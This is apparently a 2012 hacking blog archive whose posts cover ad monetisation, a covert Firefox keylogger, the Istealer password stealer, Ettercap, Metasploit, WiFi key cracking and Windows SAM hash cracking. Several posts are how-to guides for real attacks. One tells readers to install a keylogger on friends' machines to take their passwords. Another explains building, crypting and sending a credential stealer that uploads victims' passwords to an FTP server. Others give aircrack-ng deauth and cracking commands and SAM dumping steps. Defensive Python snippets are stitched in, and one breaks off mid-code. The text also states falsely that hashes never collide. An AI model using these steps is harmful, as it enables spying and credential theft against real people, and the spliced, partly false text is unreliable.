
Saturday, March 31, 2012

Earn Money from In-Text Advertising on Your Website with Infolinks


Are you looking for monetization opportunities for your blog or website? Most bloggers and webmasters look for monetization opportunities to earn extra income from their published content. As their site's user engagement grows, they find monetization to be a hidden opportunity to jump a few more steps ahead. When it comes to monetization, you will find various kinds of options if you google it. When we hear about monetization, banner advertisements on a website come to mind. That's how we define an advertisement on web space. But would you like to display ads without reserving any space on your website?

There is nothing to wonder about. Infolinks is a provider of pay-per-click ads for websites, and their approach differs from that of other advertisers. Infolinks offers advertisements for the text or content already available on your website. This is called In-Text advertising: it detects suitable keywords in your content and matches them with available ads. Their dynamic proprietary algorithm is also capable of maintaining the relevancy of ads to your site content. Once a match is found, Infolinks integrates ads with your text, and an ad is activated as a pop-up bubble when a user hovers over the text. As it doesn't cost you extra space on your website, you can use it with other monetization alternatives too.

As it is incorporated into your text, you may say a BIG "NO" to Infolinks if you are concerned about your search engine rankings and optimization. But having Infolinks In-Text ads on your website will not interfere with your SEO, as the Infolinks script is based on JavaScript and search engines can't crawl these ads on your site. You should be cautious, though, in case your visitors start to believe your in-line text links are spammy. Therefore you had better mention Infolinks on your website and control the number of links displayed within a page.

Infolinks does not impose restrictions or requirements on publishers for integrating it on websites. However, your application will be reviewed to find out whether any illegal or offensive activity happens on your website. Infolinks lets you customize its functionality to optimize In-Text ads for your website. The links will start to appear right after you integrate the Infolinks script. It offers popular payment methods such as PayPal, Bank Wire, E-Check and ACH with certain thresholds or payout limits. Overall, Infolinks is a useful monetization option with a moderate to high payout rate if you generate enough quality content on your blog or website.

Steps:

1. Sign up for a new Infolinks publisher account.

Note: Once you have signed up for a new account, you will have to wait until the Infolinks team reviews your application. After the review, you will get a confirmation email to access your account.

2. Now sign in to your account.

3. Navigate to My Websites page.

4. Now access the customization options by clicking on the customize icon, and save changes after the customization. There you can change:

- Appearance of In-text advertising links

- Number of links per page

- Category of your content

Note: You can see a preview of your changes in the example box.


5. Now set up your Payment Details to receive payments.

6. Navigate to Integration page.

7. Select your website unless it is already selected, and copy the script code for your website.

8. Now go and add the Infolinks script code to your website right before the </body> tag in your template.


* You can control Infolinks In-Text ads and enable them only for your preferred area on the website. You just need to enclose the content area where you want to show ads in <!--INFOLINKS_ON--> and <!--INFOLINKS_OFF--> tags as below:

<!--INFOLINKS_ON-->
[This is my content area where Infolinks In-Text ads will be displayed. Content not enclosed by these tags won't be eligible for In-Text ads.]
<!--INFOLINKS_OFF-->


More Information:

* You can configure extra Infolinks widgets to increase your revenue even more. Configure Related Tags, Tag Cloud and Search Widget of your choice.

* You can view how your readers engage with Infolinks In-Text advertisements via Infolinks Reports.

Thursday, March 29, 2012

xenotix keylogx keylogger for Firefox

Most people use Firefox as their default browser, so I am going to give you one of the best tools (add-ons) for Firefox ...
If you want the passwords of your friends or anyone else, just install this add-on on his/her computer/laptop; it is possible only if you have physical access...
So let's start...
  1. Open Firefox (Internet is required).
  2. Go to the Tools menu and click on Add-ons, or simply press Ctrl+Shift+A.
  3. Find the "xenotix keylogx" key-logger.
  4. After downloading it, install it.
  5. Restart Firefox.
  6. Press Alt+x
  7. and set a password.
  8. Finish...
  9. When you get physical access to that computer/laptop, just press Alt+x and enter your password.
  10. A log file will open, and in that log file are written all the keys which were pressed by your friends in Firefox...
  11. Finish
  12. So in this way you can get all the passwords and all the things...
Hope Its Cool One......

Sunday, March 25, 2012

Istealer 4.0

Istealer can be used to hack email account password and find passwords of various emails.

Istealer Password stealer - hack email passwords:

  1. Download Istealer password stealer software to hack email account password.
  2. Unzip the downloaded windows password stealer.
  3. Go to http://www.esmartstart.com/ and sign up for free account. After creating free ftp server account, enable FTP Access and create a new folder named "Istealer" at your FTP.
  4. Run the Loader.exe file present in Istealer folder to get something like:
  5. Istealer windows password stealer
  6. Now, simply fill the following in Istealer:
  7.  Host: ftpserver.esmartdesign.com
  8.  Username and Password: Your username and password for esmartstart ftp server.
  9. Directory: /Istealer.
  10. You can bind Istealer to any other file by checking "Bind with another file" and giving file path to bind with. Also, you can use Icon Change to change Istealer file icon. This step is optional but, necessary for hiding password stealer from victim's eyes. You can bind password stealer file with fake error message.
  11. To check whether you have entered right ftp server information, hit "Test" and if you have done it right, you will get message "Works perfect". If it says "Cannot connect to FTP Server", you have entered something wrong... just check it again.
  12. When you've done all above steps, simply hit on "Build" and save the password stealer file as you want. You can also use Crypter to avoid antivirus detection.
  13. Now, simply send this password stealer file to victim and make him run this windows password stealer file on his computer(Social Engineering). After he runs our sent password stealer file on his computer, you will get all passwords and records saved on his computer at your FTP server.
That's it. Thus, you can hack email account password using Istealer- the windows password stealer software. Remember to crypt and then bind this windows Password stealer to make it undetectable by antivirus. If you have any problem in using this Istealer password stealer software to hack email account password, please mention it in comments.

Enjoy Istealer to hack email account password...

Ettercap (Tool for sniffing gmail, yahoo, paypal, etc. passwords)

Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks.
It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis.
Ettercap is a Unix and Windows tool for computer network protocol analysis and security auditing.
It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols.
It is free open source software, licensed under the terms of the GNU General Public License.

Ettercap offers four modes of operation:
  1. IP-based: packets are filtered based on IP source and destination.
  2. MAC-based: packets are filtered based on MAC address, useful for sniffing connections through a gateway.
  3. ARP-based: uses ARP poisoning to sniff on a switched LAN between two hosts (full-duplex).
  4. PublicARP-based: uses ARP poisoning to sniff on a switched LAN from a victim host to all other hosts (half-duplex).
In addition, the software also offers the following features:
  1. Character injection into an established connection. Ettercap is the first software capable of sniffing an SSH connection in full duplex.
  2. HTTPS support: the sniffing of HTTP SSL secured data--even when the connection is made through a proxy.
  3. Remote traffic through a GRE tunnel: the sniffing of remote traffic through a GRE tunnel from a remote Cisco router, and perform a man-in-the-middle attack on it.
  4. Plug-in support: creation of custom plugins using Ettercap's API.
  5. Password collectors for: TELNET, FTP, POP, IMAP, rlogin, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, Napster, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, Half-Life, Quake 3, MSN, YMSG
  6. Packet filtering/dropping: setting up a filter that searches for a particular string (or hexadecimal sequence) in the TCP or UDP payload and replaces it with a custom string/sequence of choice, or drops the entire packet.
  7. OS fingerprinting: determine the OS of the victim host and its network adapter.
  8. Kill a connection: killing connections of choice from the connections-list.
  9. Passive scanning of the LAN: retrieval of information about hosts on the LAN, their open ports, the version numbers of available services, the type of the host (gateway, router or simple PC) and estimated distances in number of hops.
  10. Hijacking of DNS requests.
  11. Ettercap also has the ability to actively or passively find other poisoners on the LAN.

Very interesting.. Isn't it? But don't forget that this will work only if the victim is on the same LAN as you are.
Ettercap official website: http://ettercap.sourceforge.net/ 
Ettercap download page: http://ettercap.sourceforge.net/download.php
We recommend Linux to get the best out of Ettercap.
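Seen from the defending side, the ARP-based modes listed above leave a recognisable trace: one MAC address suddenly answering for several IP addresses, usually including the gateway. The sketch below is an added example, not part of the original post and not Ettercap's own detection code; the observation format, addresses and function names are constructed for illustration.

```python
# Added example: flag signs of ARP poisoning in a series of ARP observations.
# Each observation is "time ip mac", e.g. collected by polling the local ARP
# cache or by logging ARP replies. All addresses below are constructed.

SAMPLE = """\
10:00:01 192.168.1.1  00:11:22:33:44:55
10:00:01 192.168.1.20 aa:bb:cc:00:00:20
10:00:01 192.168.1.30 aa:bb:cc:00:00:30
10:05:12 192.168.1.1  aa:bb:cc:00:00:30
10:05:12 192.168.1.20 aa:bb:cc:00:00:30
10:05:13 192.168.1.30 aa:bb:cc:00:00:30
"""


def parse_observations(text):
    """Turn 'time ip mac' lines into (time, ip, mac) tuples; skip malformed lines."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:
            rows.append((parts[0], parts[1], parts[2].lower()))
    return rows


def find_arp_anomalies(rows):
    """Return findings for two poisoning indicators.

    ("mac-changed", time, ip, old_mac, new_mac)
        an IP address that used to map to one MAC now maps to another
    ("mac-shared", time, mac, (ip, ip, ...))
        a single MAC currently answers for more than one IP address
    """
    current = {}      # ip -> MAC most recently seen for it
    reported = set()  # (mac, ips) combinations already reported
    findings = []
    for ts, ip, mac in rows:
        previous = current.get(ip)
        if previous is not None and previous != mac:
            findings.append(("mac-changed", ts, ip, previous, mac))
        current[ip] = mac
        claimed = tuple(sorted(i for i, m in current.items() if m == mac))
        if len(claimed) > 1 and (mac, claimed) not in reported:
            reported.add((mac, claimed))
            findings.append(("mac-shared", ts, mac, claimed))
    return findings


def suspected_poisoners(findings):
    """MAC addresses that answered for several IPs at the same time."""
    return {f[2] for f in findings if f[0] == "mac-shared"}


if __name__ == "__main__":
    for finding in find_arp_anomalies(parse_observations(SAMPLE)):
        print(finding)
    print("suspected:", suspected_poisoners(find_arp_anomalies(parse_observations(SAMPLE))))
```

A hit is a lead rather than proof: DHCP reassignment, router failover and proxy ARP also change or share MAC addresses, so confirm against the switch's port table before acting.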

Wednesday, March 21, 2012

Now Watch Indian TV Shows On Youtube

Back in 2009, Youtube launched a new ‘Television Shows’ section where anyone could watch full length TV shows for free. At the time it was launched, the service was first made available only to US citizens and then it gradually rolled out to other parts of the world. Indian TV viewers, you’ll be happy to know that the ‘Television Shows’ section is now accessible in India where you can watch Indian TV serials with full length episodes for free right on the Youtube website.

Monday, March 12, 2012

I.P. Utilities

The following are the IP utilities available in Windows that help in finding out information about IP hosts and domains. These are the basic IP Hacking Commands that everyone must know!

NOTE: The term Host used in this article can also be assumed as a Website for simple understanding purpose.

1. PING

PING is a simple application (command) used to determine whether a host is online and available. The PING command sends one or more ICMP Echo messages to a specified host requesting a reply. The receiver (Target Host) responds to this ICMP Echo message and returns it back to the sender. This confirms that the host is online and available. Otherwise the host is said to be unavailable.

Syntax:
C:\>ping hnk007.co.cc
The following image shows the ping command which pings the host hnk007.co.cc



2. TELNET
The Telnet command is used to connect to a desired host on a specified port number. For example:
Syntax:
C:\>telnet yahoo.com 25
C:\>telnet yahoo.com


3. NSLOOKUP
Many times we think about finding out the IP address of a given site, say for example google.com, yahoo.com, microsoft.com etc. But how to do this? There are some websites that can be used to find out the IP address of a given site, but in Windows we have an inbuilt tool to do this job for us. It is nslookup. This tool can be used for resolving a given domain name into its IP address (determining the IP of a given site name). Not only this, it can also be used for reverse IP lookup. That is, if the IP address is given, it determines the corresponding domain name for that IP address.

Syntax:
C:\>nslookup google.com

The following image shows the usage of the nslookup command.

4. NETSTAT
The netstat command can be used to display the current TCP/IP network connections. For example, the following netstat command displays all connections and their corresponding listening port numbers.
Eg: C:\>netstat -a
This command can be used to determine the IP addresses/host names of all the applications connected to your computer. If a hacker is connected to your system, even the hacker's IP is displayed. So the netstat command can be used to get an idea of all the active connections to a given system.

Metasploit Framework : Hack the Planet


Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.




Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project managed by Rapid7.

The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.

The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Metasploit was created in 2003 as a portable network game using the Perl scripting language. Later, the Metasploit Framework was completely rewritten in the Ruby programming language. It is most notable for releasing some of the most technically sophisticated exploits to public security vulnerabilities. In addition, it is a powerful tool for third party security researchers to investigate potential vulnerabilities. On October 21st, 2009 the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.

Like comparable commercial products such as Immunity's CANVAS or Core Security Technologies' Core Impact, Metasploit can be used to test the vulnerability of computer systems in order to protect them, and it can be used to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities.

Metasploit's emerging position as the de facto vulnerability development framework has led in recent times to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk, and remediation of that particular bug. Metasploit 3.0 (Ruby language) is also beginning to include fuzzing tools, to discover software vulnerabilities in the first instance, rather than merely writing exploits for currently public bugs. This new avenue has been seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November, 2006.

Metasploit Official Website: http://www.metasploit.com/
Metasploit download page: http://www.metasploit.com/framework/download/

Nessus: Premier vulnerability assessment tool

In computer security, Nessus is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example:
  • Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
  • Misconfiguration (e.g. open mail relay, missing patches, etc).
  • Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
  • Denials of service against the TCP/IP stack by using mangled packets
On UNIX (including Mac OS X), it consists of nessusd, the Nessus daemon, which does the scanning, and nessus, the client, which controls scans and presents the vulnerability results to the user. For Windows, Nessus 3 installs as an executable and has a self-contained scanning, reporting and management system.
According to surveys done by sectools.org, Nessus is the world's most popular vulnerability scanner, taking first place in the 2000, 2003, and 2006 security tools survey. Tenable estimates that it is used by over 75,000 organizations worldwide.

In typical operation, Nessus begins by doing a port scan with one of its four internal portscanners (or it can optionally use Amap or Nmap) to determine which ports are open on the target and then tries various exploits on the open ports. The vulnerability tests, available as subscriptions, are written in NASL (Nessus Attack Scripting Language), a scripting language optimized for custom network interaction.
Tenable Network Security produces several dozen new vulnerability checks (called plugins) each week, usually on a daily basis. These checks are available for free to the general public; commercial customers are not allowed to use this Home Feed any more. The Professional Feed (which is not free) also gives access to support and additional scripts (audit and compliance tests...).
Optionally, the results of the scan can be reported in various formats, such as plain text, XML, HTML and LaTeX. The results can also be saved in a knowledge base for debugging. On UNIX, scanning can be automated through the use of a command-line client. There exist many different commercial, free and open source tools for both UNIX and Windows to manage individual or distributed Nessus scanners.
If the user chooses to do so (by disabling the option 'safe checks'), some of Nessus's vulnerability tests may try to cause vulnerable services or operating systems to crash. This lets a user test the resistance of a device before putting it in production.
Nessus provides additional functionality beyond testing for known network vulnerabilities. For instance, it can use Windows credentials to examine patch levels on computers running the Windows operating system, and can perform password auditing using dictionary and brute force methods. Nessus 3 and later can also audit systems to make sure they have been configured per a specific policy, such as the NSA's guide for hardening Windows servers.

Nessus official website : http://www.nessus.org/nessus/

Saturday, March 10, 2012

Crack WEP, WPA-2 and WPA-PSK Wi-Fi Network key

We assume that if you have reached here to read this post, then you at least know that to hack a wireless network you need a machine with a wireless card installed, preferably a lappy which can be carried easily.

Step 1: airmon-ng

Please download Backtrack 4 from HERE

airmon-ng stop wlan0
iwconfig (to find all wireless network interfaces and their status)
airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)

Note: You can use the su command to switch to a root account.




Step 2: airodump-ng

This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:

airodump-ng mon0 - monitors all channels, listing available access points and associated clients within range. It is best to select a target network with strong signal (PWR column), more traffic (Beacons/Data columns) and associated clients (listed below all access points). Once you've selected a target, note its Channel and BSSID (MAC address). Also note any STATION associated with the same BSSID (client MAC addresses).

Step 3: airodump-ng (Capture data)

To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels. Assuming our wireless card is mon0, and we want to capture packets on channel 6 into a text file called data:

airodump-ng -c 6 --bssid 00:0F:CC:7D:5A:74 -w data mon0 (the -c 6 switch captures data on channel 6, --bssid 00:0F:CC:7D:5A:74 is the MAC address of our target access point, -w data specifies that we want to save captured packets into a file called "data" in the current directory, and mon0 is our wireless network adapter)


You typically need between 20,000 and 40,000 data packets to successfully recover a WEP key.

Step 4: aireplay-ng (Increase Traffic)

An active network can usually be penetrated within a few minutes. However, slow networks can take hours, even days to collect enough data for recovering the WEP key.

This optional step allows a compatible network interface to inject/generate packets to increase traffic on the wireless network, therefore greatly reducing the time required for capturing data. The aireplay-ng command should be executed in a separate terminal window, concurrent to airodump-ng. It requires a compatible network card and driver that allows for injection mode.

Assuming your network card is capable of injecting packets, in a separate terminal window try:

aireplay-ng -3 -b 00:0F:CC:7D:5A:74 -h 00:14:A5:2F:A7:DE -x 50 wlan0
-3 --> this specifies the type of attack, in our case ARP-request replay
-b ..... --> MAC address of access point
-h ..... --> MAC address of associated client from airodump
-x 50 --> limit to sending 50 packets per second
wlan0 --> our wireless network interface



Step 5: aircrack-ng (Crack WEP)

WEP cracking is a simple process, only requiring collection of enough data to then extract the key and connect to the network. You can crack the WEP key while capturing data. In fact, aircrack-ng will re-attempt cracking the key after every 5000 packets.

To attempt recovering the WEP key, in a new terminal window, type:

aircrack-ng data*.cap (assuming your capture file is called data...cap, and is located in the same directory)

Step 6: aircrack-ng

WPA, unlike WEP, rotates the network key on a per-packet basis, rendering the WEP method of penetration useless. Cracking a WPA-PSK/WPA2-PSK key requires a dictionary attack on a handshake between an access point and a client. What this means is, you need to wait until a wireless client associates with the network (or deassociate an already connected client so they automatically reconnect). All that needs to be captured is the initial "four-way-handshake" association between the access point and a client. WPA hashes the network key using the wireless access point's SSID as salt. This prevents the statistical key-grabbing techniques that broke WEP, and makes hash precomputation more difficult because the specific SSID needs to be added as salt for the hash.

With all that said, the weakness of WPA-PSK comes down to the passphrase. A short/weak passphrase makes it vulnerable to dictionary attacks.

To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. This can be obtained using the same technique as with WEP in step 3 above, using airodump-ng.

You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:

aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client (where MAC_AP is the MAC address of the access point, and MAC_Client is the MAC address of an associated client).

Once you have captured a four-way handshake, you also need a large/relevant dictionary file with common passphrases. See related links below for some wordlist links.

You can then execute the following command in a Linux terminal window (assuming both the dictionary file and captured data file are in the same directory):

aircrack-ng -w dictionary_file capture_file

Notes:
Cracking WPA-PSK and WPA2-PSK may take much longer, and will only succeed with weak passphrases and good dictionary files.

Alternatively, there are tools like coWPAtty that can use precomputed hash files to speed up dictionary attacks. Those hash files can be very effective, but quite big in size. The Church of WiFi has computed hash tables for the 1000 most common SSIDs against a million common passphrases that are 7Gb and 33Gb in size...

How to detect unknown open ports and their associated applications using FPORT V2.0

The first step in a hacking attack is information gathering and footprinting. It involves searching for the victim's open ports. Various applications for doing this are available on the Internet. But what can we do to stop/prevent a hacker from knowing which ports of our system are open? Here is where Fport comes into the picture.
fport reports all open TCP/IP and UDP ports and maps them to the owning application. This is the same information you would see using the 'netstat -an' command, but it also maps those ports to running processes with the PID, process name and path. Fport can be used to quickly identify unknown open ports and their associated applications.




Usage:

C:\>fport

Pid Process Port Proto Path
392 svchost -> 135 TCP C:\WINNT\system32\svchost.exe
8 System -> 139 TCP
8 System -> 445 TCP
508 MSTask -> 1025 TCP C:\WINNT\system32\MSTask.exe
392 svchost -> 135 UDP C:\WINNT\system32\svchost.exe
8 System -> 137 UDP
8 System -> 138 UDP
8 System -> 445 UDP
224 lsass -> 500 UDP C:\WINNT\system32\lsass.exe
212 services -> 1026 UDP C:\WINNT\system32\services.exe

The program contains five (5) switches. The switches may be utilized using either a '/' or a '-' preceding the switch. The switches are:

Usage:
/? usage help
/p sort by port
/a sort by application
/i sort by pid
/ap sort by application path
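The port-to-process mapping is most useful when it is compared against a known-good snapshot of the same machine. The following is an added example, not part of Fport or of the original post: it parses the output format shown above, treats that listing as the baseline, and audits a later snapshot. The extra "updater" line, the trusted-directory list and all function names are constructed for illustration.

```python
# Added example: diff two fport listings to surface unexpected listeners.
import re
from collections import namedtuple

Listener = namedtuple("Listener", "pid process port proto path")

# Baseline: the fport output shown in the post.
BASELINE_OUTPUT = r"""
Pid Process Port Proto Path
392 svchost -> 135 TCP C:\WINNT\system32\svchost.exe
8 System -> 139 TCP
8 System -> 445 TCP
508 MSTask -> 1025 TCP C:\WINNT\system32\MSTask.exe
392 svchost -> 135 UDP C:\WINNT\system32\svchost.exe
8 System -> 137 UDP
8 System -> 138 UDP
8 System -> 445 UDP
224 lsass -> 500 UDP C:\WINNT\system32\lsass.exe
212 services -> 1026 UDP C:\WINNT\system32\services.exe
"""

# Later snapshot: the baseline plus one constructed, made-up entry.
LATER_OUTPUT = BASELINE_OUTPUT + r"""
1744 updater -> 4444 TCP C:\Documents and Settings\All Users\updater.exe
"""

# Assumption: directories from which listening binaries are expected to run.
TRUSTED_DIRS = ("c:\\winnt\\system32\\",)

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+->\s+(\d+)\s+(TCP|UDP)(?:\s+(.+))?$")


def parse_fport(text):
    """Parse fport's 'Pid Process -> Port Proto Path' lines; the path may be absent."""
    listeners = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if match:
            pid, process, port, proto, path = match.groups()
            listeners.append(Listener(int(pid), process, int(port), proto, path or ""))
    return listeners


def audit(baseline, current, trusted_dirs=TRUSTED_DIRS):
    """Return (listener, reasons) for every entry in `current` worth a closer look."""
    known = {(l.proto, l.port, l.process.lower()) for l in baseline}
    findings = []
    for l in current:
        reasons = []
        if (l.proto, l.port, l.process.lower()) not in known:
            reasons.append("listener not in baseline")
        if l.path and not l.path.lower().startswith(trusted_dirs):
            reasons.append("image outside trusted directories")
        if not l.path and l.process.lower() != "system":
            reasons.append("no image path reported")
        if reasons:
            findings.append((l, reasons))
    return findings


if __name__ == "__main__":
    base = parse_fport(BASELINE_OUTPUT)
    for listener, reasons in audit(base, parse_fport(LATER_OUTPUT)):
        print(listener.proto, listener.port, listener.process, listener.path, reasons)
```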

Rainbow Crack : The Time-Memory Tradeoff Hash Cracker : Crack Windows passwords

Before going ahead with the discussion let us first explain to you why it is so difficult to crack windows passwords.

Windows uses NTLM, LM or MD5 algorithm to encrypt the plain text passwords and saves them in the system32/config folder. The encrypted passes that are saved in the SAM file under system32/config are called hashes. Now don't just browse the SAM file and attempt opening it. It's useless doing this under Windows. Even if you get to open this file using another OS, e.g. a live Linux distro, you need the keyhive, coz the SAM file is further encrypted with its key in the 'system' file under the same dir as SAM.

The algorithms NTLM, LM or MD5 are not proprietary. So the first thing you might think is, WOW!! then just get the hashes apply the reverse algorithm on them and recover the password. But it's not so easy smart ass. Read further.




Common features of NTLM, LM and MD5 algo:
1) Once the hashes are formed, it is computationally infeasible to recover the original string from the cipher. In layman's lang, the algorithm is irreversible.

2) No two strings can ever have the same hashes.

3) A minor change in the string causes a considerable change in the hash. This is known as avalanche effect.

So when you log in to your box and enter the password, the password you entered gets encrypted in one of the forms above, and then the hashes so formed are compared to the saved hashes; if they match, you are allowed into the system. So from this you can see that even your computer is not aware of your real password.

The passes of your email accounts are also stored in a similar fashion. That's the reason why, when you say you forgot your password, the website resets your password and can't show you your original password, coz even they don't know it.




So the only way to crack the hashes is using brute-force. This is where rainbow tables come into the scene. Rainbow tables sound fancy but are very simple to understand. Rainbow tables are a collection of strings and their relative pre-compiled hashes. Each of the hashes in the rainbow table is checked against the original hash, and the one which matches has its corresponding string as the password. Sounds complicated?? Don't worry script kiddies. Hacktivism has already bundled all that you need to crack these hashes.
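The login comparison and the precomputed-table idea described above both depend on the stored hash being unsalted: the same password then always yields the same hash, so one table serves every account. The following is an added example, not part of the original post and not how Windows stores passwords; SHA-256 stands in for a fast unsalted hash, PBKDF2 with a random per-account salt is the chosen countermeasure, and the sample passwords and function names are constructed.

```python
# Added example: unsalted vs. salted password storage, and the avalanche effect.
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumption: work factor chosen for this illustration


def fast_unsalted_hash(password):
    """Fast, unsalted digest: identical passwords always give identical output."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def differing_bits(a, b):
    """Avalanche effect: number of digest bits (out of 256) that differ."""
    da = hashlib.sha256(a.encode("utf-8")).digest()
    db = hashlib.sha256(b.encode("utf-8")).digest()
    return sum(bin(x ^ y).count("1") for x, y in zip(da, db))


def store_password(password, salt=None):
    """Derive a slow, salted verifier; returns (salt, derived_key) for storage."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per account
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, derived


def verify_password(password, salt, stored):
    """Recompute with the stored salt and compare in constant time."""
    _, candidate = store_password(password, salt)
    return hmac.compare_digest(candidate, stored)


def compare_schemes(password):
    """Two accounts, same password: what does each storage scheme reveal?"""
    salt_a, key_a = store_password(password)
    salt_b, key_b = store_password(password)
    return {
        # True: a single precomputed entry would match both accounts
        "unsalted_identical": fast_unsalted_hash(password) == fast_unsalted_hash(password),
        # False: each account would need a table built for its own salt
        "salted_identical": key_a == key_b,
        "login_ok": verify_password(password, salt_a, key_a),
    }


if __name__ == "__main__":
    print(compare_schemes("Summer2012"))
    print("bits changed by a one-character edit:",
          differing_bits("Summer2012", "Summer2013"))
```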

One of the most widely used tools for hash cracking is Rainbow Crack. You can download it from http://project-rainbowcrack.com/ or if you are using backtrack, it is already installed.

Well rainbow crack takes hashes as inputs. So first you have to extract those hashes from the SAM file. Now we assume that you are using BackTrack 4. If you are not, download it and then come back.

In backtrack to make things easy, go to the media where windows is installed, browse to the WINDOWS/System32/config folder and then copy the SAM and system file and place it on the desktop.

Open the terminal and type the following command:

samdump2 SAM system

This will give the following output



Now copy the part which shows all the accounts and their respective hashes and save them in a file, say, hashes.txt
Now you can either use rainbowcrack, john the ripper or ophcrack.

To use rainbowcrack you need the appropriate rainbow tables. These rainbow tables are very huge, sometimes ranging in GBs. So they are bulky to download. Alternately, you can make your own Rainbow Tables using RTGen (more on this in the next post) but you can consider downloading some light-weight RT until then.

Download RT from
http://www.project-rainbowcrack.com/table.htm

To start cracking place the downloaded RT in /pentest/passwords/rcrack

Syntax for cracking hashes using rcrack. Go to the BackTrack Menu>Privilege Escalation>Password Attacks>Offline Attacks>Rainbow Crack

Now type

./rcrack rainbow-table-name -f hashes.txt

It may take a long time before finding the correct hash and the corresponding pass. So take a nap and come back...


This post may not be up to the mark, but this is how things are. The methodology can get better. You have to figure out ways to allay the steps. If you want to be a hacker, there is no spoon feeding. So only research is the way to successful hacking.

WiFi Hacking Basics Part 1

If you are reading this, you must have used WiFi at least once, or maybe you have your own WiFi network at home. WiFi is cool and hacking WiFi is a lot more interesting. Here I am gonna tell you the basics of wireless networks and how they are hacked, so that you get a grasp of what is going on with your WiFi.
You can try these attacks yourself. For this you will need:
  • Laptop with Backtrack installed or Backtrack in VW.
  • Access Point(AP)
  • USB WiFi Adapter Card which support packet injection(I recommend Alpha Card)
  • A Smartphone or another laptop with WiFi (as a Victim)
For those who don't know Backtrack,its a Pentest Linux Distro with all tools necessary.Access point can be any SOHO WiFi router.USB WiFi Adapter is for packet injection because normal Laptop WiFi card chip-set don't support Packet Injection.
So lets get started with basics or theory.
Normally your WiFi card hears all the wireless networks around it, but it only accepts packets destined for it, and only if it is connected to a network at all. The AP (access point) broadcasts the network's SSID all the time. The SSID is the name given to a wireless network. The network can be open or closed. An open network doesn't require any authentication; a closed network, on the other hand, requires a shared key to connect to it.


So how do we sniff which networks are out there?
For this we use a tool suite in BackTrack called Aircrack-ng. To sniff the packets we create a virtual interface called a monitor mode interface (mon0). mon0 is created on top of the wireless interface on your laptop, say wlan0.
The first task is to create mon0.
In BackTrack, open a terminal and type:

airmon-ng start wlan0

Now mon0 is created. To verify it, type ifconfig in the terminal; you will notice the mon0 interface, with the same MAC address as your WiFi card.
There is another tool we are going to use to see the actual packets: Wireshark. Next, fire up Wireshark by typing wireshark & in the terminal. You will see mon0 listed among the interfaces; start a capture on mon0.



Then you will see lots of packets if there is any WiFi connection in your vicinity. If you don't see any traffic, create a network using your AP and check the SSIDs.
What we learned: how to create mon0 and sniff traffic.
Contd.. part 2
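Most of the packets in such a capture are beacons, the frames in which the AP announces its SSID and whether the network is open or closed. The decoder below is an added example, not part of the original post: it assumes the radiotap header that a monitor-mode capture prepends has already been stripped, the function names are hypothetical, and the sample frames are constructed in the code.

```python
import struct

PRIVACY = 0x0010  # capability bit: data frames on this network are encrypted

def build_beacon(ssid, protected, bssid=bytes.fromhex("020000000001")):
    """Build a minimal beacon (constructed sample input, no radiotap header)."""
    header = struct.pack("<HH6s6s6sH", 0x0080, 0, b"\xff" * 6, bssid, bssid, 0)
    caps = 0x0001 | (PRIVACY if protected else 0)   # ESS bit marks an AP
    fixed = struct.pack("<QHH", 0, 100, caps)       # timestamp, interval, caps
    name = ssid.encode()
    return header + fixed + bytes([0, len(name)]) + name  # element 0 = SSID

def parse_beacon(frame):
    """Return bssid/ssid/hidden/protected for a beacon frame, else None."""
    if len(frame) < 36:                  # 24-byte header + 12 fixed bytes
        return None
    frame_control = struct.unpack_from("<H", frame, 0)[0]
    ftype, subtype = (frame_control >> 2) & 0x3, (frame_control >> 4) & 0xF
    if ftype != 0 or subtype != 8:       # management type, beacon subtype
        return None
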